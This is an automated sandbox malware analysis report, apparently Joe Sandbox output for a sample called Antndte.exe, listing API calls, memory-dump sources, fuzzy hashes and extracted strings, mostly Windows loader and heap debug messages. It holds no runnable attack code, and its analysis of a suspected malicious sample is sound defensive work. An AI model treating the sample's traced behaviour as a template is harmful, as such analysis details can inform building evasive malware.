                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Antndte.exe,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                                                                                                • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                                                • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                                                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:0%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:30.8%
                                                                                                                                Total number of Nodes:91
                                                                                                                                Total number of Limit Nodes:0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1 357f2d10-357f2d1c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
• Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d2ce2e313afd8dae85a0209a22e48c6c44c3fcc10bbaf966649ff804458c3bf7
                                                                                                                                • Instruction ID: ddd468cdc3de5fa017f1ae5ca3b12a7c30c80db0136547f149ab92d44ecdb61b
                                                                                                                                • Opcode Fuzzy Hash: d2ce2e313afd8dae85a0209a22e48c6c44c3fcc10bbaf966649ff804458c3bf7
                                                                                                                                • Instruction Fuzzy Hash: 2890023120140423D51161584A05707001947D0341FD1CC57A0414618DD6668D9AB921
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2 357f34e0-357f34ec LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
• Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: bc760386493fe4d90822d767c76c8a544146cb075daadab2d38c7e5dbf6d1e4c
                                                                                                                                • Instruction ID: 36f39bff1ee460d400150702a5158a1f9bebae38a199188a22923660ee4e60ac
                                                                                                                                • Opcode Fuzzy Hash: bc760386493fe4d90822d767c76c8a544146cb075daadab2d38c7e5dbf6d1e4c
                                                                                                                                • Instruction Fuzzy Hash: AE90023160550412D50061584A15706101547D0301FA1CC56A0414628DC7A58D997DA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 357f2b90-357f2b9c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
• Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 822c157306e944543faa64cbf9194f2eedc54c8285cc5c284c3d3f2954c22ab6
                                                                                                                                • Instruction ID: 7b3fc0dd7ac001ce0cd5db26e3e90282cf60e0b37cb35db50079fbb2c4f222e6
                                                                                                                                • Opcode Fuzzy Hash: 822c157306e944543faa64cbf9194f2eedc54c8285cc5c284c3d3f2954c22ab6
                                                                                                                                • Instruction Fuzzy Hash: D390023120148812D5106158890574A001547D0301F95CC56A4414718DC6A58CD97921
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
control_flow_graph 3 35859060-358590a9 GetPEB, RtlDebugPrintTimes (graph edge list not reproduced)
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
• Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $ $0
                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                • Opcode ID: a26357e56e3c9efb1fb81a3cef3783badc1e92fa19aef0b1efc7c9e2427febc2
                                                                                                                                • Instruction ID: 6939234749e0446a77f8b9cdedbe47cc1f21a3149e6b662dd52f235625ea13fe
                                                                                                                                • Opcode Fuzzy Hash: a26357e56e3c9efb1fb81a3cef3783badc1e92fa19aef0b1efc7c9e2427febc2
                                                                                                                                • Instruction Fuzzy Hash: 9D3211B16083818FE350CF68C884B9BBBF5BB88354F044D2EF59987250D7B5E94ACB52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
control_flow_graph 142 357e8540-357e85a1 GetPEB (graph edge list not reproduced)
                                                                                                                                Strings
                                                                                                                                • Invalid debug info address of this critical section, xrefs: 358252C1
                                                                                                                                • 8, xrefs: 358250EE
                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 35825215, 358252A1, 35825324
                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 358252ED
                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 358252D9
                                                                                                                                • double initialized or corrupted critical section, xrefs: 35825313
                                                                                                                                • Critical section address, xrefs: 35825230, 358252C7, 3582533F
                                                                                                                                • corrupted critical section, xrefs: 358252CD
                                                                                                                                • Address of the debug info found in the active list., xrefs: 358252B9, 35825305
                                                                                                                                • undeleted critical section in freed memory, xrefs: 35825236
                                                                                                                                • Critical section address., xrefs: 3582530D
                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 3582534E
                                                                                                                                • Critical section debug info address, xrefs: 3582522A, 35825339
                                                                                                                                • Thread identifier, xrefs: 35825345
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
• Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                • Opcode ID: 83cafed67e845df7fce8a9a4d3dc1a45390bc897e35ef8fbc49bae3bb2d3b5cb
                                                                                                                                • Instruction ID: d444c216d9bdf932c9a3e9da74c9d6295113ec03d8bc97f60eea6d5283e28bb2
                                                                                                                                • Opcode Fuzzy Hash: 83cafed67e845df7fce8a9a4d3dc1a45390bc897e35ef8fbc49bae3bb2d3b5cb
                                                                                                                                • Instruction Fuzzy Hash: D78177B5A41348AFEB14CF95D844BAEBBB5FB08710F214199E904BF280D771AD85CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
control_flow_graph 194 3585fdf4-3585fe16 RtlDebugPrintTimes, GetPEB (graph edge list not reproduced)
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
• Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                • API String ID: 3446177414-1700792311
                                                                                                                                • Opcode ID: 08a0984251434e5e9a45b3b3c4ce603e2a101afc6d7c2088edf9a653cf4f08ad
                                                                                                                                • Instruction ID: f3127c74fc42a3aaf09a7f6120b0fc990fcc84dff529908c12fa145d049d5601
                                                                                                                                • Opcode Fuzzy Hash: 08a0984251434e5e9a45b3b3c4ce603e2a101afc6d7c2088edf9a653cf4f08ad
                                                                                                                                • Instruction Fuzzy Hash: 01D1207A614789DFCB02CFA8D404AADBBF2FF49314F048599E545AB322CB35AD41CB14
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                • Opcode ID: 16c5b7edef56674568e9ffc6ba155813d97f858bfe85611e77bac62dba57f3a7
                                                                                                                                • Instruction ID: ba1c7a4f2fc10bddb8e230fff0ba63cd9e8d840700a38f7958f3a451432c9589
                                                                                                                                • Opcode Fuzzy Hash: 16c5b7edef56674568e9ffc6ba155813d97f858bfe85611e77bac62dba57f3a7
                                                                                                                                • Instruction Fuzzy Hash: F45192B55083199BD315CF198885B9BB7E9FF84360F604D1EF95A87240E771DA04CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                • API String ID: 3446177414-1745908468
                                                                                                                                • Opcode ID: cc7079a75ab6e7db9784ce26b65cc32062c7a374e98c967af8d4ef27872238d6
                                                                                                                                • Instruction ID: bdaf4fba679a557ff2bd9970fcb82d90924efe7cd907af831f5a4e5f14beace5
                                                                                                                                • Opcode Fuzzy Hash: cc7079a75ab6e7db9784ce26b65cc32062c7a374e98c967af8d4ef27872238d6
                                                                                                                                • Instruction Fuzzy Hash: DD911FBAA04748DFEB02CFA8D444ADDBBF2FF49360F448899E545AB251CB75AD41CB10
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 357A651C
                                                                                                                                  • Part of subcall function 357A6565: RtlDebugPrintTimes.NTDLL ref: 357A6614
                                                                                                                                  • Part of subcall function 357A6565: RtlDebugPrintTimes.NTDLL ref: 357A665F
                                                                                                                                Strings
                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3580977C
                                                                                                                                • LdrpInitShimEngine, xrefs: 35809783, 35809796, 358097BF
                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 358097B9
                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35809790
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 358097A0, 358097C9
                                                                                                                                • apphelp.dll, xrefs: 357A6446
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                • Opcode ID: a0a2da658322a18a05196f46ebef7f444bc508232942e25d5cba604444d97429
                                                                                                                                • Instruction ID: 021d5d489f0eee2c5fe529448c3259a19cff85243b138c53574eea092446a5fc
                                                                                                                                • Opcode Fuzzy Hash: a0a2da658322a18a05196f46ebef7f444bc508232942e25d5cba604444d97429
                                                                                                                                • Instruction Fuzzy Hash: 7251AC72608304AFE325DF24DC85BAAB7F9EB84744F400A19F9959B250EB30ED05CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 357AD06F
                                                                                                                                • h.}5, xrefs: 3580A5D2
                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 357AD0E6
                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 357AD136
                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 357AD202
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 357AD263
                                                                                                                                • @, xrefs: 357AD24F
                                                                                                                                • @, xrefs: 357AD2B3
                                                                                                                                • @, xrefs: 357AD09D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.}5
                                                                                                                                • API String ID: 0-1530669686
                                                                                                                                • Opcode ID: 6c93343632cb682fc3966ea4dc2798b6c7a73eaadf7eec31dd40e6e25aaa4a8b
                                                                                                                                • Instruction ID: e37497923e1d239a3aadab8586a3c2cde1fb91934400346417c13f3aba1cd9aa
                                                                                                                                • Opcode Fuzzy Hash: 6c93343632cb682fc3966ea4dc2798b6c7a73eaadf7eec31dd40e6e25aaa4a8b
                                                                                                                                • Instruction Fuzzy Hash: B8A16EB25183059FE321CF64C844B9BB7E9BB84755F014A2EF9889B240EB75D908CF93
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 357DD879
                                                                                                                                  • Part of subcall function 357B4779: RtlDebugPrintTimes.NTDLL ref: 357B4817
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                • Opcode ID: 99529d426244b650b10fc09f0f6a85f448d0f74bbb3ba08dbb6a254d3abbda7e
                                                                                                                                • Instruction ID: 2bef73e6e99b9f588c5850c7a2cd59370b551c09d5614af4dfe0ff2f4234c3a5
                                                                                                                                • Opcode Fuzzy Hash: 99529d426244b650b10fc09f0f6a85f448d0f74bbb3ba08dbb6a254d3abbda7e
                                                                                                                                • Instruction Fuzzy Hash: 2351AA75A04385DFEB45CFA4C48879DFBF2BB44314F664099D8016F281DB74A986CBD0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                • API String ID: 0-2224505338
                                                                                                                                • Opcode ID: 332fd09b78e77382b7b1d477d5cdd0204e29c22911990086b853b4b013540f7e
                                                                                                                                • Instruction ID: 193119419c080aa84fe4a66360b12cb50dd802bfca4d42ae9703440e250a366b
                                                                                                                                • Opcode Fuzzy Hash: 332fd09b78e77382b7b1d477d5cdd0204e29c22911990086b853b4b013540f7e
                                                                                                                                • Instruction Fuzzy Hash: AC51ACBA661288EFD701CFA4D88CF5AB7F4EB046B4F1188A9F8059F261CB75DD50CA50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • VerifierDebug, xrefs: 35838925
                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 358386BD
                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 3583880F
                                                                                                                                • VerifierFlags, xrefs: 358388D0
                                                                                                                                • VerifierDlls, xrefs: 3583893D
                                                                                                                                • HandleTraces, xrefs: 3583890F
                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 358386E7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                • Opcode ID: 25a245dd5e523a9619c63575614a77f0ddef736146669fb44f799f8d8c7403a7
                                                                                                                                • Instruction ID: f69325c98f37ae3d50242c77068b27d21f61a5a30484722cea4da97751629bae
                                                                                                                                • Opcode Fuzzy Hash: 25a245dd5e523a9619c63575614a77f0ddef736146669fb44f799f8d8c7403a7
                                                                                                                                • Instruction Fuzzy Hash: AE91EF7AA0B751AFE711CF68C882B5AB7F5BB44714F450958E950AF240EB70AC06CFD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                • DGx5, xrefs: 357D2382
                                                                                                                                • LdrpDynamicShimModule, xrefs: 3581A7A5
                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3581A79F
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3581A7AF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DGx5$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-4193848126
                                                                                                                                • Opcode ID: ff1c2ae8ddc8ad4511f509112336ae7e4d7a1680e81ad9bfe491656881a8bec0
                                                                                                                                • Instruction ID: 9e4042ae43d480c02b641a1b0ef12a2b5a08ad2d42a1eddb6bd27a6591f54440
                                                                                                                                • Opcode Fuzzy Hash: ff1c2ae8ddc8ad4511f509112336ae7e4d7a1680e81ad9bfe491656881a8bec0
                                                                                                                                • Instruction Fuzzy Hash: B331D276A10200EFE7149F59D886F9AB7B6FB80740F154069ED11AB250DFB0AE43CBD0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmp
